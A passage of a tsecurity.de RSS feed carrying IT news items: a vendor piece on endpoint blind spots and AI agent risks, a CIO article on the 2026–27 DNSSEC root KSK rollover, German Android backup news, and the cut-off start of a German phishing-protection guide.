<p class="wp-block-paragraph">As for potential edge-case glitches, Huston says it is possible, but if third-party vendors do not properly handle the update, there will be other issues as well, as the KSK cryptographic key used within DNSSEC signs and validates the keys that protect DNS records. </p>



<p class="wp-block-paragraph">“If it is not standards-compliant, then you have more problems than just the KSK roll,” Huston says, “as it raises the obvious question of ‘What else is not correctly implemented in the DNS resolver that I’m running?’”</p>



<p class="wp-block-paragraph">As a silver lining, Acceligence’s Greis says any hiccups that result from the DNS KSK update may be a gift in disguise for CIOs. </p>



<p class="wp-block-paragraph">“The irony is that some of the most business-critical components in the technology stack are often the least visible because they work in the background,” Greis says. January “may reveal how much modern business resilience depends on infrastructure that many organizations rarely examine until something breaks. For CIOs, that’s the real lesson. This is not fundamentally a story about a DNS update. It is a story about operational visibility, resilience, and governance. Organizations that treat the rollover as a routine infrastructure task will likely complete the update and move on. Organizations that use it as an opportunity to understand and strengthen the foundations of their technology environment may gain far more value than simply avoiding an outage.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[5 endpoint blind spots your EDR/XDR was never built to see]]></title>
<description><![CDATA[In August 2025, 126 malicious packages landed in the npm registry. Even after the community caught the initial wave, 80 of these hidden backdoors remained actively listed.



That was enough. Over 86,000 downloads. Malicious code in PhantomRaven, packages running in the production systems of Fort...]]></description>
<link>https://tsecurity.de/de/3692679/it-nachrichten/5-endpoint-blind-spots-your-edrxdr-was-never-built-to-see/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692679/it-nachrichten/5-endpoint-blind-spots-your-edrxdr-was-never-built-to-see/</guid>
<pubDate>Sat, 25 Jul 2026 00:18:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In August 2025, 126 malicious packages landed in the npm registry. Even after the community caught the initial wave, 80 of these hidden backdoors remained actively listed.</p>



<p class="wp-block-paragraph">That was enough. Over 86,000 downloads. Malicious code in <a href="https://www.koi.ai/blog/phantomraven-npm-malware-hidden-in-invisible-dependencies" target="_blank" rel="noreferrer noopener">PhantomRaven</a>, packages running in the production systems of Fortune 500 companies worldwide. And throughout the entire window, not a single EDR/XDR alert.</p>



<p class="wp-block-paragraph">This happened because the attack surface has expanded to a layer EDR/XDR was never designed to see: VS Code extensions, local MCP servers, and rogue AI coding assistants that inherit your engineers’ valid credentials to steal data at machine speed.</p>



<p class="wp-block-paragraph">To eliminate this structural vulnerability, Palo Alto Networks acquired Koi, an AI-native developer security product engineered for proactive, precision enforcement. Below we compiled a 2026 CISO checklist you can use to audit your environment and see how Koi automates each defense from day one.</p>



<p class="wp-block-paragraph"><strong>#1. Gain real-time visibility into shadow AI &amp; extensions</strong></p>



<p class="wp-block-paragraph">Your existing asset management tracks binaries and installers, but it cannot see local VS Code extensions, MCP servers, or ad-hoc Python scripts running on developer endpoints. This visibility gap was recently exposed by the <a href="https://www.koi.ai/blog/maliciouscorgi-the-cute-looking-ai-extensions-leaking-code-from-1-5-million-developers" target="_blank" rel="noreferrer noopener">MaliciousCorgi campaign</a>, where two marketplace extensions with 1.5 million combined installs silently harvested every file a developer opened. Neither triggered any detection because they were not binaries, not executables, not anything your inventory was built to flag. To counter this, Koi closes the gap by analyzing what extensions actually do after installation, exposing hidden data-harvesting channels running inside your active workspace.</p>



<p class="wp-block-paragraph"><strong>#2. Distinguish between human and autonomous agent behavior </strong></p>



<p class="wp-block-paragraph">When a rogue AI agent exfiltrates your proprietary source code, it uses a developer’s valid credentials during normal working hours, making the session look entirely legitimate to standard XDR baselines. Moving beyond static permission lists, Koi deploys behavioral profiling within the workspace runtime. By actively intercepting unauthenticated background tasks and blocking unauthorized file-system reads, it stops automated data exfiltration in real time.</p>



<p class="wp-block-paragraph"><strong>#3. Establish guardrails for automated package updates on endpoints</strong></p>



<p class="wp-block-paragraph">Developers prioritize speed, often allowing software packages to auto-update on their endpoints the moment a new version appears. Attackers weaponize this supply chain vulnerability, as seen in the May 2026 Team PCP attack where 3,800 GitHub repositories were compromised in just 36 minutes via poisoned auto-updates. Securing agentic endpoints against these rapid breaches requires behavior-based inspection within the active workspace context. Koi operates at this layer by providing safe deployment buffers that automate version cooldowns, blocking bleeding-edge updates until they are vetted. By continuously auditing process creation within the IDE runtime, Koi instantly drops unauthorized remote connections before malicious payloads can exfiltrate credentials from the endpoint.  </p>



<p class="wp-block-paragraph"><strong>#4. Enforce principle of least privilege for AI agents</strong></p>



<p class="wp-block-paragraph">AI coding assistants inherit the privileges of whoever deployed them. In practice, that means read access to production databases, write access to core repositories, and access to every secret in environment files and configuration directories. To restrict this excessive access, Koi applies dynamic sandboxing directly to AI agent processes at the kernel level. It enforces a strict zero-trust boundary that segregates sensitive workspace vectors, preventing agents from pulling data outside their approved scope without interrupting developer workflows.</p>



<p class="wp-block-paragraph"><strong>#5. Maintain continuous endpoint posture management</strong></p>



<p class="wp-block-paragraph">Signature-based scanning only stops known threats. Sophisticated repository attacks often arrive as functional, high-rated software that carries no known bad signature. Koi’s research into the <a href="https://www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers" target="_blank" rel="noreferrer noopener">DarkSpectre campaign</a> found eight browser extensions, all carrying “featured” badges from Google and Microsoft, installed by over 8 million users, silently harvesting every conversation from ChatGPT, Claude, and Gemini in the background. Koi addresses this by operating upstream: scanning marketplace listings every hour, using LLM-driven code analysis to compare what software promises against what its code does, sandboxing it, and scoring the risk before it ever reaches the endpoint.</p>



<p class="wp-block-paragraph"><strong>Summary</strong></p>



<p class="wp-block-paragraph">Securing the modern enterprise is no longer about patching individual gaps. As AI agents redefine the workforce, Agentic Endpoint Security (AES) is now a strategic imperative for every CISO. By establishing a mandatory control plane for the AI-native workspace, AES ensures that your organization can scale engineering velocity without ever compromising enterprise integrity. </p>



<p class="wp-block-paragraph">Ready to secure the future of your software stack? See how <a href="https://www.paloaltonetworks.com/cortex/agentic-endpoint-security" target="_blank" rel="noreferrer noopener">Koi Agentic Endpoint Security</a> delivers complete visibility, risk scoring, and real-time prevention across every endpoint in your enterprise.</p>



<p class="wp-block-paragraph"></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CIOs beware: DNS KSK rollover could kick off wave of mysterious outages]]></title>
<description><![CDATA[Predicting an outage is tricky business, but CIOs might want to circle Oct. 11, 2026, through Jan. 11, 2027, for likely trouble of a potentially widespread and puzzling nature.



That’s because a relatively trivial update to DNSSEC on Oct. 11, one that will take full effect by Jan. 11, is likely...]]></description>
<link>https://tsecurity.de/de/3691225/it-security-nachrichten/cios-beware-dns-ksk-rollover-could-kick-off-wave-of-mysterious-outages/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691225/it-security-nachrichten/cios-beware-dns-ksk-rollover-could-kick-off-wave-of-mysterious-outages/</guid>
<pubDate>Fri, 24 Jul 2026 12:09:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Predicting an outage is tricky business, but CIOs might want to circle Oct. 11, 2026, through Jan. 11, 2027, for likely trouble of a potentially widespread and puzzling nature.</p>



<p class="wp-block-paragraph">That’s because a relatively trivial update to DNSSEC on Oct. 11, one that will take full effect by Jan. 11, is likely to deliver a series of seemingly unrelated system outages. This will come from oceans of dependencies from third-party, shadow, agentic, gen AI, SaaS, homegrown, and legacy apps — among many other quiet executable hiding spots, including virtual environments and containers.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/joshithak/">Sai Joshitha Kathari</a>, senior site reliability engineer at payment card giant Visa, says most enterprises have far more DNS-related exposure than they realize because of these many dependencies.</p>



<p class="wp-block-paragraph">“This has the potential to create real downstream destruction when unresolved failures sit underneath important business functions,” Kathari says. </p>



<p class="wp-block-paragraph">The danger is that so many of these issues are either unknown to IT or handled by a third-party vendor and no one in IT has had reason to ask those vendors about DNS updates. </p>



<p class="wp-block-paragraph">“The risky areas are usually not the obvious managed DNS services. They are the older internal applications, hardcoded resolvers, containerized workloads, sidecar configurations, custom scripts, partner integrations, VM images, stale base images, and service-to-service dependencies that nobody has touched in a long time,” Kathari explains. “These systems can keep working quietly for years, then fail during a DNS or certificate-related change because they bypassed the normal platform standards.”</p>



<p class="wp-block-paragraph">Independent technology analyst <a href="https://www.linkedin.com/in/carmi/">Carmi Levy</a> says that CIOs need to take this event very seriously. </p>



<p class="wp-block-paragraph">“The two-pronged deadline — October 11, 2026, when the new Key Signing Key (KSK) begins signing the root zone, and January 11, 2027, when the old key is retired — should be marked in red on everyone’s calendar, just as December 31, 1999, once was,” Levy says. “Failure to comply could result in websites, critical business applications, and related resources dropping off the face of the Earth once the transition is complete.”</p>



<p class="wp-block-paragraph">Levy adds: “Custom-built code that lives outside conventional support mechanisms may or may not function when the DNS changes go into effect.”</p>



<p class="wp-block-paragraph">The <a href="https://www.icann.org/resources/press-material/release-2026-05-20-en">DNSSEC update itself</a> is straightforward, but it is also the first significant DNSSEC change — specifically a change in the trust anchor — since 2018. </p>



<p class="wp-block-paragraph">The rollout statement noted that “the trust anchor is formally known as the Domain Name System Security Extensions (DNSSEC) root zone Key Signing Key (KSK). The KSK is the cryptographic key at the core of the DNSSEC trust anchor and is used to verify that DNS responses are legitimate and have not been modified in transit.”</p>



<h2 class="wp-block-heading">Expect nearly every enterprise to be impacted</h2>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/kimdavies/">Kim Davies</a>, vice president of IANA Services and president of public technical identifiers at ICANN, says the extent of the impact on enterprises is unknowable, given the nature of shadow IT and other edge cases. </p>



<p class="wp-block-paragraph">But based on the massive number of dependencies both known and unknown in the typical global enterprise, Davies guesses that just about every enterprise will be impacted, to varying degrees. </p>



<p class="wp-block-paragraph">“In highly complex organizations, it is very likely there will be some impact in the corners, in the margins, of the organization,” Davies tells CIO. “DNS is such a core technology that underpins everything.”</p>



<p class="wp-block-paragraph">As the updates propagate, hiccups will materialize, Davies notes. “When the system cannot validate the [DNS] information, it will treat it as suspect and DNS lookups will fail.”</p>



<p class="wp-block-paragraph">Visa’s Kathari says, “Enterprises should expect some secondary DNS-related glitches when major DNSSEC-related changes happen, not necessarily because the core infrastructure teams will ignore the update, but because large environments have many hidden dependency paths.”</p>



<p class="wp-block-paragraph">Making this problem far worse, Kathari notes, is that the glitches will likely initially look like anything other thana DNS glitch. That will force IT staff to waste a vast number of hours chasing causes that ultimately prove to be unrelated to the incidents. </p>



<p class="wp-block-paragraph">“The impact for CIOs is that DNS failures rarely announce themselves as DNS failures. They look like application timeouts, broken logins, failed API calls, queue lag, payment failures, partner connectivity issues, or random regional instability,” Kathari explains. “That makes troubleshooting slower because teams may spend hours looking at the application, database, network, or cloud provider before realizing name resolution is part of the failure path.”</p>



<p class="wp-block-paragraph"><a href="https://greyhoundresearch.com/svg/">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, agrees that IT will likely spin its wheels chasing the wrong ghosts.</p>



<p class="wp-block-paragraph">“A validation failure rarely stays in its lane. It surfaces as an application error, an API timeout, or a reachability problem, which turns a resolver fault into a coordination failure,” Gogia says. “The application team blames the network, the network team blames the cloud, and the user simply watches work stop.”</p>



<p class="wp-block-paragraph">“Images and templates are the frontier most teams miss,” Gogia adds. “A resolver fixed in summer can be broken again in October the instant a stale golden image is redeployed, because automation no longer lets configuration drift slowly. It restores yesterday’s assumptions at machine speed.”</p>



<p class="wp-block-paragraph">It is widely expected that enterprises will not have any problems executing the change or, more likely, relying on their hyperscalers to properly handle the change. That is the concern. </p>



<p class="wp-block-paragraph">“CIOs are being distracted so much with AI and this is such a deep in the weeds infrastructure issue that this can and willcatch people off-guard,” <a href="https://acceligence.com/talent/profiles/justin-greis/">Justin Greis</a>, CEO of consulting firm Acceligence, tells CIO. “I think we’ll see a meaningful number of enterprise disruptions associated with the DNSSEC trust anchor rollover. Not because the update itself is especially difficult, but because it will expose weaknesses that already exist inside many organizations.”</p>



<p class="wp-block-paragraph">Most enterprise IT operations have had no reason to compile a comprehensive list of all DNS dependencies, but many will be instantly discovered in January. </p>



<h2 class="wp-block-heading">Potentially widespread fallout</h2>



<p class="wp-block-paragraph">A major retailer, for example, might suddenly be unable to connect with FedEx to arrange for deliveries or a hospital may find that test results are no longer being shared with patient portals. It might manifest as an assembly line that halts because an IIoT component can no longer share files with its vendor system or a truck fleet that stops being tracked. </p>



<p class="wp-block-paragraph">“There will almost certainly be systems that fall through the cracks. Some will be legacy applications that rely on outdated DNS configurations that have not been updated in years,” Greis says. “Others will be business-unit-developed tools, contractor-built solutions, embedded systems, manufacturing and industrial systems, or highly customized workloads that operate outside normal IT oversight. These are the types of systems that often surface during infrastructure events like this.”</p>



<p class="wp-block-paragraph">Greis adds that many enterprises will discover in January problems created by their own automation.</p>



<p class="wp-block-paragraph">“Over time, enterprises build layers of processes, templates, and deployment mechanisms that are reused across teams and environments,” Greis notes. “Even after DNS infrastructure is updated correctly, older settings can inadvertently be reintroduced through routine updates and system changes, creating intermittent and difficult-to-diagnose failures.”</p>



<p class="wp-block-paragraph">The good news from this situation is that enterprises are not going to likely lose all DNS access if any of these glitches occur. But that may be of no comfort because even if the disruptions are only with small edge cases, that can still cause massive operational disruptions.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/cricketliu/">Cricket Liu</a>, EVP and chief evangelist at Infoblox, gives the example of a DNS server that responds to factory-floor system queries.</p>



<p class="wp-block-paragraph">“Or let’s say this disrupts [an enterprise’s key] SaaS application. All name resolution may stop and it will show a server failure. It will not deliver a response whenever I look anything up. That’s not subtle at all,” Liu says. “It’s highly likely that companies are going to see some effects.”</p>



<p class="wp-block-paragraph">Back in 2017, the switchover was relatively uneventful, giving some CIOs hope that January 2027 will also be a non-event. But given the technology advancements in the last 10 years and the resulting tidal wave of new enterprise tech dependencies, few are realistically expecting no problems this go around. </p>



<h2 class="wp-block-heading">Impossible to predict what will happen</h2>



<p class="wp-block-paragraph">One of the top network experts on DNS effects in enterprises is <a href="https://blog.apnic.net/author/geoff-huston/">Geoff Huston</a>, chief scientist at the Asia Pacific Network Information Centre (APNIC), the regional Internet Registry administering IP addresses for the Asia Pacific region.</p>



<p class="wp-block-paragraph">Huston says it is difficult to project what will happen in January until it happens.</p>



<p class="wp-block-paragraph">“Just like the last time, we are flying blind with this key roll. Because nothing really terrible happened last time, there is some confidence that nothing terrible will happen this time, but we just can’t tell in advance as there are no good measurement approaches that allow us to peek inside the trust state of recursive resolvers,” he says.</p>



<p class="wp-block-paragraph">As for potential edge-case glitches, Huston says it is possible, but if third-party vendors do not properly handle the update, there will be other issues as well, as the KSK cryptographic key used within DNSSEC signs and validates the keys that protect DNS records. </p>



<p class="wp-block-paragraph">“If it is not standards-compliant, then you have more problems than just the KSK roll,” Huston says, “as it raises the obvious question of ‘What else is not correctly implemented in the DNS resolver that I’m running?’”</p>



<p class="wp-block-paragraph">As a silver lining, Acceligence’s Greis says any hiccups that result from the DNS KSK update may be a gift in disguise for CIOs. </p>



<p class="wp-block-paragraph">“The irony is that some of the most business-critical components in the technology stack are often the least visible because they work in the background,” Greis says. January “may reveal how much modern business resilience depends on infrastructure that many organizations rarely examine until something breaks. For CIOs, that’s the real lesson. This is not fundamentally a story about a DNS update. It is a story about operational visibility, resilience, and governance. Organizations that treat the rollover as a routine infrastructure task will likely complete the update and move on. Organizations that use it as an opportunity to understand and strengthen the foundations of their technology environment may gain far more value than simply avoiding an outage.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android: Neue Funktionen im Juli 2026 – ein Überblick]]></title>
<description><![CDATA[Google ist aktuell dabei, ein neues Google-Play-System-Update auszurollen. Damit erhalten Android-Nutzer monatlich neue Funktionen, die einen direkten Einfluss auf ihr Smartphone haben (unabhängig vom Hersteller).



Die Seite 9to5Google hat die wichtigsten Neuerungen zusammengefasst. Demnach bek...]]></description>
<link>https://tsecurity.de/de/3691100/it-nachrichten/android-neue-funktionen-im-juli-2026-ein-ueberblick/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691100/it-nachrichten/android-neue-funktionen-im-juli-2026-ein-ueberblick/</guid>
<pubDate>Fri, 24 Jul 2026 11:19:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google ist aktuell dabei, ein neues Google-Play-System-Update auszurollen. Damit erhalten Android-Nutzer monatlich neue Funktionen, die einen direkten Einfluss auf ihr <a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank" rel="noreferrer noopener">Smartphone </a>haben (unabhängig vom Hersteller).</p>



<p>Die Seite <a href="https://9to5google.com/2026/07/09/android-documents-backup/" target="_blank" rel="noreferrer noopener">9to5Google</a> hat die wichtigsten Neuerungen zusammengefasst. Demnach bekommen Android-Nutzer die Option, die Sicherung von SMS-, MMS- und RCS-Nachrichten direkt zu steuern. Das ähnelt der <a href="https://www.pcwelt.de/article/3181692/alle-android-nutzer-bekommen-nun-diese-wichtige-backupfunktion.html" target="_blank" rel="noreferrer noopener">separaten Backup-Einstellung für ausgewählte Apps</a>, die wir Ihnen letzte Woche vorgestellt hatten.</p>



<p>Über <strong>Einstellungen &gt; Konten und Sicherung &gt; Google-Sicherung &gt; Weitere Gerätedaten</strong> gibt es nach Erhalt des Updates einen neuen Ein-/Aus-Schalter für SMS- und MMS-Nachrichten, Anrufverlauf und Geräteeinstellungen. Sie haben also deutlich mehr Kontrolle darüber, welche Daten Sie über die Google-Cloud speichern wollen.</p>



<p>Das ist auch besonders wichtig, da Google seit Neuestem <a href="https://www.pcwelt.de/article/3185747/google-erlaubt-android-nutzern-ab-sofort-kein-kostenloses-backup-mehr-speicherplatz-angererechnet.html" target="_blank" rel="noreferrer noopener">keine Gratis-Backups für Android-Geräte mehr erlaubt</a>. Jedes Backup Ihres Smartphones zählt also direkt auf Ihr verfügbares Speicherkontingent ein, das in der Gratis-Variante gerade einmal 15 GB sind.</p>



<p>Zusätzlich führt Android nun die lokale Sicherung von Dokumenten ein. Damit können Sie Ihre heruntergeladenen Dokumente automatisch in Google Drive speichern, damit diese sicher und von jedem Ihrer Geräte aus zugänglich sind. Auf der Seite „Sicherung“ erscheint dann neben „Fotos &amp; Videos“ und „Sonstige Gerätedaten“ ein neues Menü namens „Dokumente“.</p>



<p>Google erklärt, dass zu den unterstützten Dateiformaten .DOC, .PPT, .XLS, .PDF “und alle anderen auf diesem Gerät gespeicherten Dokumente” gehören. Dokumente sollen bei der Übertragung zwischen Ihrem Gerät und den Google-Diensten verschlüsselt werden. Änderungen, die an den Dokumenten an einem Ort vorgenommen werden, werden nicht mit anderen Orten synchronisiert.</p>



<h3 class="wp-block-heading">Mehr Neuerungen</h3>



<p>In den <a href="https://support.google.com/product-documentation/answer/14343500?hl=de" target="_blank" rel="noreferrer noopener">Versionshinweisen zu den Google-Systemdiensten</a> finden sich noch mehr kleine Neuerungen, die jetzt an Android-Nutzer ausgerollt werden. Dazu gehören unter anderem die Überarbeitung von In-App-Käufen mithilfe einer “verbesserten, nativen Storefront für Google One”, die Übertragung von Arbeitsprofilen auf Wear-OS-Smartwatches, eine neue Google-Standortfreigabe für Chromebooks sowie „neue Funktionen für Entwickler von Google- und Drittanbieter-Apps zur Unterstützung von Prozessen in ihren Apps im Zusammenhang mit Google Maps”.</p>



<p>All diese neuen Funktionen werden seit dem 6. Juli an Android-Nutzer verteilt. Über <strong>Einstellungen</strong> <strong>&gt;</strong> <strong>Sicherheit und Datenschutz</strong> <strong>&gt;</strong> <strong>Updates</strong> <strong>&gt;</strong> <strong>Google Play-Systemupdate</strong> können Sie die aktuell installierte Version der Google Play System Updates prüfen und gegebenenfalls auf eine neue Version aktualisieren.</p>



<p><a href="https://www.pcwelt.de/article/3092158/android-17-diese-smartphones-bekommen-das-update-komplette-geraeteliste.html" target="_blank" rel="noreferrer noopener">Android 17: Diese Smartphones bekommen das Update</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dieses Startup darf jetzt Spiegel ins All schießen – und die Nacht erhellen]]></title>
<description><![CDATA[Ein Raumfahrt-Startup hat die Freigabe für ein ungewöhnliches Projekt bekommen. Sie wollen die Sonne auf die dunkle Seite der Erde reflektieren. Wozu das nützlich sein soll und warum es daran Kritik gibt.
weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3691073/it-nachrichten/dieses-startup-darf-jetzt-spiegel-ins-all-schiessen-und-die-nacht-erhellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691073/it-nachrichten/dieses-startup-darf-jetzt-spiegel-ins-all-schiessen-und-die-nacht-erhellen/</guid>
<pubDate>Fri, 24 Jul 2026 11:03:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein Raumfahrt-Startup hat die Freigabe für ein ungewöhnliches Projekt bekommen. Sie wollen die Sonne auf die dunkle Seite der Erde reflektieren. Wozu das nützlich sein soll und warum es daran Kritik gibt.
<a href="https://t3n.de/news/reflect-orbital-weltraum-spiegel-nacht-zum-tag-1752522/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google erlaubt Android-Nutzern kein Gratis-Backup mehr: Schonfrist von 45 Tagen]]></title>
<description><![CDATA[Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite Engadget berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.



Für neue...]]></description>
<link>https://tsecurity.de/de/3691045/it-nachrichten/google-erlaubt-android-nutzern-kein-gratis-backup-mehr-schonfrist-von-45-tagen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691045/it-nachrichten/google-erlaubt-android-nutzern-kein-gratis-backup-mehr-schonfrist-von-45-tagen/</guid>
<pubDate>Fri, 24 Jul 2026 10:50:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite <a href="https://www.engadget.com/2209189/google-will-now-count-all-android-backup-data-toward-your-storage-cap/">Engadget</a> berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.</p>



<p>Für neue Android-Nutzer gilt die Änderung seit dem<strong> 7. Juli 2026</strong>. Für bestehende Nutzer gilt eine Schonfrist von <strong>45 Tagen</strong>, bis sie in Kraft tritt. Google informiert Nutzer per Mail dazu:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Wir möchten dich über eine bevorstehende Aktualisierung unserer Speicherrichtlinien informieren. Außerdem führen wir neue Steuerelemente ein, mit denen du deine Android-Sicherungen besser verwalten kannst.</p>



<p><strong>Richtlinienänderung:</strong> In 45 Tagen werden alle Daten, die in den Sicherungen deines Android-Geräts enthalten sind, auf das Speicherplatzlimit deines Google-Kontos angerechnet. Fotos und Videos in Google Fotos und MMS-Daten werden bereits jetzt in deinen Google-Kontospeicherplatz einbezogen. Mit dieser Änderung werden auch alle anderen gesicherten Daten wie SMS, Anruflisten, Geräteeinstellungen und App-Einstellungen auf deinen Google-Kontospeicherplatz angerechnet. Nach Inkrafttreten dieser Richtlinie wird deine Gerätesicherung möglicherweise mehr Speicherplatz belegen. Wenn das Speicherplatzlimit deines Google-Kontos überschritten ist, werden automatische Sicherungen pausiert, bis du Speicherplatz freigibst oder dein Abo upgradest.</p>
</blockquote>



<p>Laut Google werden die Auswirkungen dieser Änderung recht begrenzt sein. Android-Sicherungskopien werden im Durchschnitt etwa <strong>40 Megabyte</strong> zusätzlichen Speicherplatz beanspruchen. Gleichzeitig werden weitere Einstellungen eingeführt, die den Nutzern mehr Kontrolle darüber geben, was gesichert wird.</p>



<p>Zuvor wurde etwa bekannt, <a href="https://www.pcwelt.de/article/3181692/alle-android-nutzer-bekommen-nun-diese-wichtige-backupfunktion.html" target="_blank" rel="noreferrer noopener">dass Android-Nutzer eine wichtige neue Backup-Funktion erhalten</a>, mit der sie selbst entscheiden können, welche App-Daten gesichert werden sollen und welche nicht. Demnächst möchte Google noch einführen, dass Nutzer ihre Geräteeinstellungen, den Anrufverlauf sowie SMS- und MMS-Nachrichten aus dem Sicherungsvorgang ausschließen können.</p>



<p>Es ist erwähnenswert, dass Google im Mai gleichzeitig den kostenlosen Speicherplatz für neue Konten <a href="https://www.pcwelt.de/article/3140205/googles-gratis-onlinespeicher-schrumpft-falls-sie-google-nicht-ihre-telefonnummer-verraten-test.html" target="_blank" rel="noreferrer noopener">von 15 Gigabyte auf 5 Gigabyte reduziert hat.</a> Es sei denn, der Nutzer verknüpft eine Telefonnummer mit dem Konto.</p>



<p>Je nachdem, wie viele Daten Sie bereits in der Google Cloud gesichert haben, könnte es also eng werden, selbst wenn die Sicherung nur wenige MB groß ist. Oder Sie merken von der Änderung nicht wirklich viel, da Sie ohnehin auf andere <a href="https://www.pcwelt.de/article/3006100/die-besten-online-backup-dienste-im-vergleich-2.html" target="_blank" rel="noreferrer noopener">Backup-Methoden</a> setzen.</p>



<p>Ein Upgrade auf 100 GB in <a href="https://one.google.com/about/plans?hl=de&amp;g1_landing_page=60" target="_blank" rel="noreferrer noopener">Google One</a> kostet 1,99 Euro monatlich, 2,99 Euro für 200 GB oder 9,99 Euro monatlich für 2 TB Speicherplatz. Mit enthalten ist auch der Zugriff auf “neue und leistungsstarke Funktionen” in Google Gemini.</p>



<p><a href="https://www.pcwelt.de/article/3006100/die-besten-online-backup-dienste-im-vergleich-2.html" target="_blank" rel="noreferrer noopener">Die besten Online-Backup-Dienste im Vergleich: Nie mehr Daten verlieren</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Phishing-Fallen: KI-Mails, QR-Codes, falsche Warnungen – so schützen Sie sich]]></title>
<description><![CDATA[Zwei große Änderungen hat es in den vergangenen Jahren bei Phishing-Angriffen gegeben: Die Kriminellen erstellen mithilfe von generativer KI sprachlich fast perfekte Mails, die in Stil, Struktur und Tonalität kaum noch von legitimen Nachrichten zu unterscheiden sind. Wo früher holpriges Deutsch s...]]></description>
<link>https://tsecurity.de/de/3691032/windows-tipps/phishing-fallen-ki-mails-qr-codes-falsche-warnungen-so-schuetzen-sie-sich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691032/windows-tipps/phishing-fallen-ki-mails-qr-codes-falsche-warnungen-so-schuetzen-sie-sich/</guid>
<pubDate>Fri, 24 Jul 2026 10:47:37 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Zwei große Änderungen hat es in den vergangenen Jahren bei Phishing-Angriffen gegeben: Die Kriminellen erstellen mithilfe von generativer KI sprachlich fast perfekte Mails, die in Stil, Struktur und Tonalität kaum noch von legitimen Nachrichten zu unterscheiden sind. Wo früher holpriges Deutsch sofort Misstrauen geweckt hat, liest sich heute eine Phishing-Mail wie eine echte Mitteilung von Microsoft, einer Bank oder einem Paketdienst.</p>



<p>Auch das Design wirkt meist höchst professionell. Zum anderen sind auch die technischen Tricks beim Datendiebstahl heute höher entwickelt. Einige Maschen umgehen sogar eine Zwei-Faktor-Authentifizierung. Das Ziel der Angreifer bleiben vor allem Zugangsdaten, Session-Tokens und persönliche Infos.</p>



<h2 class="wp-block-heading">1. Microsoft-365-Log-in-Falle trickst Zwei-Faktor-Anmeldung aus</h2>



<p>Eine neue Angriffsmethode verwendet den originalen Microsoft-Anmeldedialog und kommt entsprechend fast ohne gefälschte Webseiten aus. Die Kriminellen nutzen dafür den Oauth-Device-Code-Flow. Das ist ein Anmeldeverfahren für Geräte oder Programme, die keinen brauchbaren Browser oder keine komfortable Texteingabe bieten, etwa Smart-TVs, IoT-Geräte, Drucker oder CLI-Tools. </p>



<p>Offiziell heißt er „OAuth 2.0 Device Authorization Grant“. Mit der Methode lassen sich auch Konten übernehmen, die mit einer Zwei-Faktor-Authentifizierung geschützt sind.</p>



<p>Die Kriminellen schicken an ihre Opfer eine Phishing-Nachricht und geben vor, das Gerät der Opfer müsste für den Log-in ins Microsoft-365-Konto neu autorisiert werden. Die Nachrichten beginnen meist harmlos, etwa mit „Ihre Sitzung ist abgelaufen“, und bieten einen Link zur Neuanmeldung. Wenn das Opfer dem Link in der Nachricht folgt, landet es zunächst auf einer gefälschten Website, schließlich aber beim offiziellen Microsoft-Authentifizierungsverfahren für Geräte und Anwendungen (Oauth-Device-Code-Flow).</p>


